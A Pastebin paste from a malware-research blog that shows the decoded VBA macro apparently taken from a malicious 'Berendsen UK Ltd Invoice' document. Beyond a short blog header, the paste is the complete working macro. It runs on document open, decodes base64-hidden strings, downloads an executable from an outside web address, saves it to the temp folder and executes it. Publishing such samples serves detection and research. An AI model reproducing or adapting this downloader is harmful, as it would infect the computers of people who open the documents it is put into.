API tools faq
paste
Advertisement
Sanesecurity

Berendsen UK Ltd Invoice 1 decoded

Sanesecurity
Jan 26th, 2015
493
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.33 KB | None | 0 0
raw download clone embed print report
  1. Sanesecurity ClamAV blog: zero hour malware, phishing and scams
  2. A hopefully interesting blog from the world of zero hour malware, phishing, scams and spams
  3. http://sanesecurity.blogspot.co.uk/
  4.  
  5. Attribute VB_Name = "ThisDocument"
  6. Attribute VB_Base = "1Normal.ThisDocument"
  7. Attribute VB_GlobalNameSpace = False
  8. Attribute VB_Creatable = False
  9. Attribute VB_PredeclaredId = True
  10. Attribute VB_Exposed = True
  11. Attribute VB_TemplateDerived = True
  12. Attribute VB_Customizable = True
  13. Private Const QfmDLcA = "aHR0cDovL2VsZWt0cm9tYXJrZXQuY2JhLnBsL2pzL2Jpbi5leGU="
  14. Private Const bkRp4EmIEHl = "XExBVlVCREFKTENELmV4ZQ=="
  15. Private Const oOUPR = "VEVNUA=="
  16. Private Const QoXvtVUK = "U2hlbGwuQXBwbGljYXRpb24="
  17. Private Const gmgiLh = "Z2ZoZGZnc2Rn"
  18. Private Const Lh2UI8IfTSJJ = "R0VU"
  19. Private Const JTWAlwSMB = "TVNYTUwyLlhNTEhUVFA="
  20. Private aDecTab(255) As Integer
  21. Private Const YHg = "="
  22. Private Const SEQjeSufc = "/"
  23. Private Const jNv8XFecDC = "+"
  24. Private Const dNCBqqiwE = "9"
  25. Private Const ePZeX = "0"
  26. Private Const OMm60OhvoT = "z"
  27. Private Const hnEMr0yp = "a"
  28. Private Const lka4A = "Z"
  29. Private Const OHtV = "A"
  30. Private Const Iav = " "
  31.  
  32. Sub NsCi()
  33. e2UWZEpCVQ
  34. End Sub
  35. Sub JyXsorj()
  36. NsCi
  37. End Sub
  38. Sub autoopen()
  39. NsCi
  40. End Sub
  41. Function XPBNSN(ByVal ADLSYXKPREO As String, ByVal IKDBZPEAYPQ As String) As Boolean
  42. Dim XJVojlA6AlK As Long, MQVWCEBVJCH As Long, KEXFJZFKHXC() As Byte
  43.  
  44. Set ZNMPYFFKHMF = CreateObject(IWF0II4a(JTWAlwSMB))
  45. ZNMPYFFKHMF.Open IWF0II4a(Lh2UI8IfTSJJ), ADLSYXKPREO, False
  46. ZNMPYFFKHMF.Send IWF0II4a(gmgiLh)
  47.  
  48.  
  49. KEXFJZFKHXC = ZNMPYFFKHMF.responseBody
  50.  
  51. MQVWCEBVJCH = FreeFile
  52. Open IKDBZPEAYPQ For Binary Access Write As #MQVWCEBVJCH
  53. Put #MQVWCEBVJCH, , KEXFJZFKHXC
  54. Close #MQVWCEBVJCH
  55.  
  56. Set sdfsdfsdf = CreateObject(IWF0II4a(QoXvtVUK))
  57. sdfsdfsdf.Open Environ(IWF0II4a(oOUPR)) & IWF0II4a(bkRp4EmIEHl)
  58. End Function
  59. Sub e2UWZEpCVQ()
  60. BHngijbjfdv = Environ(IWF0II4a(oOUPR)) & IWF0II4a(bkRp4EmIEHl)
  61. sdnfhuijk = IWF0II4a(QfmDLcA)
  62. XPBNSN sdnfhuijk, BHngijbjfdv
  63. End Sub
  64.  
  65.  
  66. Public Function IWF0II4a(sEncoded As String) As String
  67. Dim p8OROg2Ya As String
  68. Dim d(3) As Byte
  69. Dim C As Byte
  70. Dim di As Integer
  71. Dim i As Long
  72. Dim SYTVw3OVtcQ As Long
  73. Dim MILoam1NHP As Long
  74. SYTVw3OVtcQ = Len(sEncoded)
  75. p8OROg2Ya = String((SYTVw3OVtcQ \ 4) * 3, Iav)
  76. MILoam1NHP = 0
  77. di = 0
  78. Call LEqE
  79. ' Read in each char in trun
  80. For i = 1 To Len(sEncoded)
  81. C = CByte(Asc(Mid(sEncoded, i, 1)))
  82. C = aDecTab(C)
  83. If C >= 0 Then
  84. d(di) = C
  85. di = di + 1
  86. If di = 4 Then
  87. Mid$(p8OROg2Ya, MILoam1NHP + 1, 3) = c3IyL8a(d)
  88. MILoam1NHP = MILoam1NHP + 3
  89. If d(3) = 64 Then
  90. p8OROg2Ya = Left(p8OROg2Ya, Len(p8OROg2Ya) - 1)
  91. MILoam1NHP = MILoam1NHP - 1
  92. End If
  93. If d(2) = 64 Then
  94. p8OROg2Ya = Left(p8OROg2Ya, Len(p8OROg2Ya) - 1)
  95. MILoam1NHP = MILoam1NHP - 1
  96. End If
  97. di = 0
  98. End If
  99. End If
  100. Next i
  101. IWF0II4a = p8OROg2Ya
  102. End Function
  103. Private Function c3IyL8a(d() As Byte) As String
  104. Dim C2OurROpo As String
  105. Dim C As Long
  106. C2OurROpo = vbNullString
  107. C = ihX4AO6OBJbw(d(0)) Or (anfuBRZrOy(d(1)) And &H3)
  108. C2OurROpo = C2OurROpo & Chr$(C)
  109. C = s4OLJjiY(d(1) And &HF) Or (D2ULJbG1EKA(d(2)) And &HF)
  110. C2OurROpo = C2OurROpo & Chr$(C)
  111. C = jyQ(d(2) And &H3) Or d(3)
  112. C2OurROpo = C2OurROpo & Chr$(C)
  113. c3IyL8a = C2OurROpo
  114. End Function
  115. Private Function LEqE()
  116. Dim t As Integer
  117. Dim C As Integer
  118. For C = 0 To 255
  119. aDecTab(C) = -1
  120. Next
  121. t = 0
  122. For C = Asc(OHtV) To Asc(lka4A)
  123. aDecTab(C) = t
  124. t = t + 1
  125. Next
  126. For C = Asc(hnEMr0yp) To Asc(OMm60OhvoT)
  127. aDecTab(C) = t
  128. t = t + 1
  129. Next
  130. For C = Asc(ePZeX) To Asc(dNCBqqiwE)
  131. aDecTab(C) = t
  132. t = t + 1
  133. Next
  134. C = Asc(jNv8XFecDC)
  135. aDecTab(C) = t
  136. t = t + 1
  137. C = Asc(SEQjeSufc)
  138. aDecTab(C) = t
  139. t = t + 1
  140. C = Asc(YHg)
  141. aDecTab(C) = t ' should be 64
  142. End Function
  143. Private Function ihX4AO6OBJbw(ByVal bytValue As Byte) As Byte
  144. ihX4AO6OBJbw = (bytValue * &H4) And &HFF
  145. End Function
  146. Private Function s4OLJjiY(ByVal bytValue As Byte) As Byte
  147. s4OLJjiY = (bytValue * &H10) And &HFF
  148. End Function
  149. Private Function jyQ(ByVal bytValue As Byte) As Byte
  150. jyQ = (bytValue * &H40) And &HFF
  151. End Function
  152. Private Function D2ULJbG1EKA(ByVal bytValue As Byte) As Byte
  153. D2ULJbG1EKA = bytValue \ &H4
  154. End Function
  155. Private Function anfuBRZrOy(ByVal bytValue As Byte) As Byte
  156. anfuBRZrOy = bytValue \ &H10
  157. End Function
  158. Private Function o5ULA(ByVal bytValue As Byte) As Byte
  159. o5ULA = bytValue \ &H40
  160. End Function
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!